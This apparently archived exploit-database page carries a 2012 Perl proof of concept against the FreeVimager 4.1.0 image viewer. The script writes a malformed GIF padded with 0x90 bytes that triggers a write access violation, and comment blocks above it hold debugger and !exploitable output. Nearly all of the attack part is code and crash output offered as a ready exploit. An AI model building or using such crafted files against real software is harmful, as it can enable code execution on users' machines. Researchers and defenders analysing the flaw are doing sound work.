what you don't know can hurt you

FreeVimager 4.1.0 WriteAV Arbitrary Code Execution

FreeVimager 4.1.0 WriteAV Arbitrary Code Execution
Posted Dec 9, 2012
Authored by Jean Pascal Pereira

FreeVimager version 4.1.0 suffers from a WriteAV arbitrary code execution vulnerability.

tags | exploit, arbitrary, code execution
MD5 | 61d798881601d91f5efcb2d152c5af4e

FreeVimager 4.1.0 WriteAV Arbitrary Code Execution

Change Mirror Download
#!/usr/bin/perl

# FreeVimager 4.1.0 <= WriteAV Arbitrary Code Execution

# Author: Jean Pascal Pereira <pereira@secbiz.de>

# Vendor URI: http://www.contaware.com

# Vendor Decription:

# This is a Free & Fast Image Viewer and Editor for Windows. It can as well play avi video files,
# ordinary audio files and audio CDs. There are many tools around doing that, but the aim of this
# Freeware is to be a small and handy tool doing what it says and running also as a standalone
# exe file (installer not necessary).

# Debug info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: "C:\Program Files\FreeVimager\FreeVimager.exe" C:\research\FreeVimager\crafted.gif
# Symbol search path is: *** Invalid ***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path. *
# * Use .symfix to have the debugger choose a symbol path. *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is:
# ModLoad: 00400000 00c9a000 image00400000
# ModLoad: 7c900000 7c9b2000 ntdll.dll
# ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
# ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
# ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
# ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.dll
# ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
# ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
# ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\COMCTL32.dll
# ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll
# ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV
# ModLoad: 7df70000 7df92000 C:\WINDOWS\system32\oledlg.dll
# ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll
# ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll
# ModLoad: 75a70000 75a91000 C:\WINDOWS\system32\MSVFW32.dll
# ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll
# ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
# ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll
# ModLoad: 3d930000 3da16000 C:\WINDOWS\system32\WININET.dll
# ModLoad: 00340000 00349000 C:\WINDOWS\system32\Normaliz.dll
# ModLoad: 78130000 78263000 C:\WINDOWS\system32\urlmon.dll
# ModLoad: 3dfd0000 3e1bb000 C:\WINDOWS\system32\iertutil.dll
# (e48.568): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
# ModLoad: 76f50000 76f58000 C:\WINDOWS\system32\Wtsapi32.dll
# ModLoad: 76360000 76370000 C:\WINDOWS\system32\WINSTA.dll
# ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll
# ModLoad: 73bc0000 73bc6000 C:\WINDOWS\system32\DCIMAN32.DLL
# ModLoad: 76380000 76385000 C:\WINDOWS\system32\msimg32.dll
# (e48.568): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00008080 ebx=00000000 ecx=0151c14c edx=08000004 esi=00000002 edi=00008080
# eip=005c02c3 esp=0012ea58 ebp=0151a008 iopl=0 nv up ei pl nz ac pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x1c02c3:
# 005c02c3 897c91f8 mov dword ptr [ecx+edx*4-8],edi ds:0023:2151c154=????????
# 0:000> r;!exploitable -v;q
# eax=00008080 ebx=00000000 ecx=0151c14c edx=08000004 esi=00000002 edi=00008080
# eip=005c02c3 esp=0012ea58 ebp=0151a008 iopl=0 nv up ei pl nz ac pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
# image00400000+0x1c02c3:
# 005c02c3 897c91f8 mov dword ptr [ecx+edx*4-8],edi ds:0023:2151c154=????????
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
# Exception Faulting Address: 0x2151c154
# First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Write Access Violation
#
# Exception Hash (Major/Minor): 0x50747228.0x58333273
#
# Stack Trace:
# image00400000+0x1c02c3
# image00400000+0x1bfd07
# image00400000+0x18abb4
# kernel32!VirtualAllocEx+0x47
# kernel32!VirtualAlloc+0x18
# image00400000+0x18a0ef
# image00400000+0x18a121
# image00400000+0x24fb01
# image00400000+0x24fc4e
# image00400000+0x23be55
# image00400000+0x95a48
# image00400000+0x4fd8
# image00400000+0xf054e
# image00400000+0xea85e
# ntdll!RtlFreeHeap+0x130
# ntdll!RtlFreeHeap+0x130
# kernel32!CreateActCtxW+0xb6c
# kernel32!CreateActCtxW+0xcbf
# Instruction Address: 0x00000000005c02c3

# Proof of Concept:

my $crafted = "\x47\x49\x46\x38\x39\x61\x18\x00\x18\x00\xC4\x00\x00\xA2\xC5".
"\xE1\xEB\xF3\xF9\x8C\xB8\xDA\x49\x8E\xC3\x95\xBD\xDC\xFE\xFE".
"\xFF\x75\xAA\xD3\x38\x84\xBE\xD5\xE5\xF1\x5D\x9A\xCA\x26\x78".
"\xB8\x22\x76\xB7\xC4\xDA\xEC\xDD\xEA\xF4\x55\x96\xC8\xF4\xF8".
"\xFC\x89\xB5\xD8\xF1\xF6\xFA\x28\x79\xB8\x87\xB5\xD8\x31\x7F".
"\xBC\x23\x77\xB8\x9E\xC3\xE0\x9E\xC3\xDF\x68\xA1\xCE\xE6\xF0".
"\xF7\xFA\xFC\xFD\x1F\x74\xB6\x8E\xB9\xDA\xFF\xFF\xFF\x1E\x73".
"\xB5\x1E\x74\xB6\x21\xF9\x04\x00\x00\x00\x00\x00\x2C\x00\x00".
"\x00\x00\x18\x00\x18\x00\x00\xFB\x05\x60";

my $junk = "\x90" x 163;

open(C, ">:raw", "crafted.gif");
print C $crafted.$junk;
close(C);

# http://0xffe4.org

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close